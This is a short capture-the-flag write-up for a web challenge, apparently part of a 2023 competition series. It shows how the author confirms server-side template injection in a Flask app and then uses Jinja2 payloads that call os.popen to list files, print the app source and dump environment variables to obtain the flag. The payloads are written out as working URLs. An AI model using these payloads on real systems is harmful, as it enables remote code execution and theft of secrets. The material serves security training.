AUCHALL - [Web] - Temp
Challenge Description
I'm temporarily storing files for you...
Solution
On opening the challenge we were given the portfolio website
There is nothing which is interesting until you check for different paths in website /login /check
Let suppose we go for /check
we see that our endpoint name is reflected on page which gives me hint for xss but wait we would get anything from that until any bot is involved so I skipped xss then I check for server side template injection
http://SERVER-IP:PORT/{{7*7}}
I got 49
which confirms that there is SSTI
Then I used ssti payload to run shell commands
http://SERVER-IP:PORT/{{ self.__init__.__globals__.__builtins__.__import__('os').popen('ls').read() }}
App Source Code
http://SERVER-IP:PORT/{{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat /app/app.py').read() }}
app.config["FLAG"] = "You're at the right path, but no. The flag is not here."
This tells that I have to fuzz the container
Then I checked for env
Flag is in env
http://SERVER-IP:PORT/{{ self.__init__.__globals__.__builtins__.__import__('os').popen('env').read() }}
Flag
Flag is dynamic
CY243L{sst1s_1n_fl4sk_ar3_ez_pz_CAa3Ee9_ZcdU_XPJ3}
Writeups 2023 © RootxRAN.